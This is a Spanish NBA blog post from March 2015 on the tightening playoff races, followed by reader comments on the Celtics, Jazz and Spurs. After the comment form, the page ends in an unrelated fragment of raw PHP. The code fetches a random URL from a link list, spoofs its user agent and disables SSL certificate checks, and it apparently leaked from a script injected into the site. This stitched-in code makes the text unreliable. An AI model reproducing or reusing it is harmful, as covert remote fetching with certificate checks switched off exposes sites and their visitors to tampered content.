Informe del fin de semana: Se aprieta el Este

16 de March de 2015 por MagicJohnson32

El fin de semana no ha ayudado en nada a aclarar los respectivos panoramas en la lucha por las últimas plazas de Playoffs de una y otra conferencia. Así que aprovecharemos este informe para revisar los partidos disputados por los equipos implicados y cuál es la situación actual. Especialmente ajustado está el Este.

Veámoslo.

celts

En el Este, el equipo con mejor inercia ahora mismo son los Celtics. Han ganado cuatro seguidos, incluyendo un triunfo fundamental el sábado en Indianapolis que frenó la racha de los Pacers y mete a los de Boston de lleno en la pelea. Va siendo hora de valorar la labor de Brad Stevens al frente de un grupo jovencísimo del que ni mucho menos esperábamos tanto este año. En estos momentos, después de la victoria de los Hornets sobre los Bulls y la derrota de los Heat ante Toronto, hay únicamente un partido de diferencia entre el séptimo clasificado, que siguen siendo los Pacers, y el décimo, que son los Celtics pero empatados con Miami. Charlotte son octavos, medio partido por detrás de Indiana y medio por delante de Heat y Celtics. No hay que descartar completamente a los Nets, que ganaron en el regreso de Thaddeus Young a Philadelphia y no están más que a tres partidos del octavo puesto. Sí podemos olvidarnos de los Pistons, que siguen a lo suyo, es decir, perdiendo partidos: van 10 consecutivos con las dos nuevas derrotas de este fin de semana ante Blazers y los Jazz, y se está haciendo más que evidente el fracaso del experimento de Reggie Jackson como base.

Ya que estamos, acabemos el repaso a la Conferencia Este, donde Hawks y Cavs caminan con paso más que firme, y más en comparación con las dudas que exudan el resto de equipos de la zona noble. Los Hawks habitarán, intocables, en la primera posición hasta final de regular season y Budenholzer sigue concentrado en administrar las energías de los suyos. Anoche ante los Lakers reservó a Millsap, Teague y Carroll (obviamente, no los necesitaba para ganar), y hoy hará lo propio con Horford. Por cierto, Korver se rompió la nariz en el partido del Staples. Por su parte, los Cavs siguen con Kyrie Irving en estado de gracia y ganaron su cuarto partido consecutivo ante los Magic. Aprovechó Blatt para reservar a Love, que no acaba de recuperarse de los problemas físicos que viene arrastrando toda la temporada.

El Oeste, decíamos, tampoco presenta mucha claridad por lo que hace al último billete para los Playoffs. Uno tiende a pensar que los Thunder darán el tirón definitivo en cualquier momento, y Pelicans y Suns cederán irremediablemente. Pero de momento no es así. Eso sí, OKC dio un paso en el sentido correcto este fin de semana con dos victorias, ante Wolves y Bulls, que sirvieron para reivindicar de nuevo la figura de Russell Westbrook. Además, los Pelicans desaprovecharon una actuación histórica de Anthony Davis esta pasada madrugada: se quedó a un paso del cuádruple doble con 36 puntos, 14 rebotes, 9 tapones y 7 asistencias, pero los Nuggets de Melvin Hunt son un equipo nuevo y acabaron por llevarse la victoria de New Orleans tras dos prórrogas. La victoria de los Suns sobre NY Knicks les sitúa tres partidos por detrás de la octava posición que ahora ocupan los Thunder con un partido de ventaja sobre Pelicans.

Destaquemos también a los Blazers, que han promediado 115 puntos en sus dos victorias de este fin de semana. Stotts parece haber encontrado la fórmula para compensar la ausencia de Matthews y los Blazers se acercan a la segunda plaza de los Grizzlies. Los de Memphis recuperaron sensaciones con un triunfo ante los Bucks, y tal vez Joerger acertó dando descanso a sus mejores hombres ante los Wizards. Ahí siguen también, con aspiraciones de cara a la segunda plaza del Oeste, los Rockets, ganadores anoche de un partido muy tenso en el Staples frente a unos Clippers que recuperaban a Griffin. Dos partidos separan a los Grizzlies, segundos, de los Rockets, cuartos.

roxclips

Quintos se han situado ya los Spurs. Lo avisábamos en el pasado Informe del fin de semana, que ya estaban aquí los Spurs, y la dolorosa derrota a manos de Kyrie Irving el pasado jueves no mancha la emergencia de los campeones, de los que no hace tanto decíamos que incluso peligraba su presencia en Playoffs. Anoche arrasaron a unos Wolves con casi más jugadores lesionados que sanos.

Finalizamos el repaso al fin de semana sin olvidar a los Jazz, que siguen cabalgando a lomos del Efecto Gobert: 5 victorias seguidas -la mejor racha de la liga- sin encajar más de 91 puntos en ningún partido. También hay que mencionar a los Kings, pero por razones opuestas: el viernes desperdiciaron una ventaja de 18 puntos contra los Sixers y el sábado, una de 19 contra los Wizards.

¿Estás de acuerdo con todo lo dicho? ¿Nos hemos dejado algo en el tintero? No dudes en participar de la discusión a través de los comentarios.

Comenta

6 comentarios a esta entrada

  1. Jose A.Ramirez dice:
    #1

    Lo de brad stevens en los celtics es para hacerle un monumento, por no tener no tenemos ni un alero decente. Tambien aprovecho para si alguien ha seguido los partidos de Celtics este año, me pueda aclarar porque al coach le han criticado a veces el sistena de rotaciones, que a veces a parecido ser caotico. Pero hay estamos, a un paso de play-offs, con un equipo de segunda mano. Que pensais que deberiamos pescar los Celtics en la proxima agencia libre? Un base? Un center? Yo veo el nucleo I.Thomas-Smart-Sully- Turner? Este ultimo tal vez… Por un lado no se si es preferible no entrar en postemporada viendo todas las rondas que disponemos y coger un mejor puesto. La terna de free agents deberia centrarla Ainge en la terna M.Gasol-Love-Monroe y algun base que lleve las riendas. Quien queda libre? Yo me imajino algo asi: quiza sea mucho soñar, veremos..
    B: Alguien que sea buen director – I.Thomas
    E: M. Smart – A. Bradley- Turner?
    A: J.Butler o K.Leonard?- Alguien del draft
    AP: Sullinger- Bass
    P: Monroe? Alguien del draft

    No estaria mal, sobre todo pescar a alguno de los dos aleros, y quiza centrarse en los pivots via drafg, ya que gasol es casi imposible y love es el sueño de los verdes pero es dificil tambien que venga. Supongo que dependiendo de los pivots que puedan conseguir dependera el resto de puestos a quien traemos o el modo, ya sea a golpe de talonario o via draft.

      Citar

  2. Chris dice:
    #2

    Los Celtics de la mano de Brad stevens están asentando las bases para volver con garantías a la zona noble de la liga.
    La salidas de Rondo y Green han dado rienda suelta a probar cosas nuevas con jugadores jóvenes y con hambre de minutos. Las ternas Turner-Bradley-Smart o Bradley-Smart-Crowder en el frontcourt aportan intensidad defensiva y movimiento de balón. Thomas es un gran fit como 6º hombre, un anotador compulsivo a buen precio y perfectamente traspasable, una perita en dulce que ha llegado a los verdes por gentileza de Danny boy.
    Y en el juego interior hay que destacar la gran buena de Tyler Zeller y la estabilidad y el saber hacer que siempre aporta Brandon Bass.
    Creo que Stevens ha dado con la tecla de lo pueden ser los C´s que nos vienen y está asentando las bases en cuanto a sistemas e identidad como equipo. Intensidad, garra y juego colectivo… a que suena a orgullo a orgullo céltico.

    Para la temporada que viene contarán con este nucleo:
    PG: Turner-I.Thomas-Pressey
    SG: M. Smart-A. Bradley
    SF:Young-(Crowder)-Draft
    PF: Sullinger- Olynyk-(Bass)-(Datome)
    C: Zeller-Draft

    De cara a la próxima temporada, este verano deberían asegurarse la continuidad de Crowder, tentar a Bass a seguir al menos por dos años y quizás ofrecerle una oportunidad (la que nunca tuvo en los Pistons) a Datome que en los últimos partidos está haciendo cositas. Estas operaciones no deberían suponer ningún compromiso salarial importante de cara al futuro.
    Vía draft llegarán al menos dos primeras rondas, entre las que habría que conseguir un center y dos segundas para ir a por un un tirador puro.
    Conseguir un peso pesado en la agencia libre lo veo complicado. Love y Marc buscarán equipos ganadores con los que puedan optar al anillo… y Monroe lo que buscará es un contratazo y no creo que deban ofrecerselo los verdes.
    Paciencia, el equipo tiene que seguir creciendo e incorporando jugadores (de las muchas rondas recopiladas) vía draft en los próximos años. Sacar algo por el expiring de Gerald Wallace al año que viene y seguir creciendo.

      Citar

  3. Jose Luis dice:
    #3

    Jazz NBA ranks since All-Star

    #1 DefRtg
    #1 NetRtg
    #1 REB%
    #1 Opp FG%
    #1 Opp 3PT%
    #1 Opp DREB
    #1 Opp REB
    #1 Opp AST
    #1 Opp PTS
    #1 WINS ????

    wow

      Citar

  4. Jose Luis dice:
    #4

    las ???? eran gestos de ovación, no preguntas xd

      Citar

  5. Jose Luis dice:
    #5

    madre mia vaya final de partido el spurs knicks…

    los knicks dandolo todo para perder… y duncan también

    En los dos último minutos de la prórroga ha fallado una bandeja, un palmeo, un tiro libre, y ha perdido el último balón de su equipo para tratar de ganar el encuentro

      Citar

  6. Triceratops dice:
    #6

    Jose Luis:
    Jazz NBA ranks since All-Star

    #1 DefRtg
    #1 NetRtg
    #1 REB%
    #1 Opp FG%
    #1 Opp 3PT%
    #1 Opp DREB
    #1 Opp REB
    #1 Opp AST
    #1 Opp PTS
    #1 WINS ????

    wow

    Resumen, desde que se han quitado a Kanter y le han dado minutos a Gobert, han subido como la espuma

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>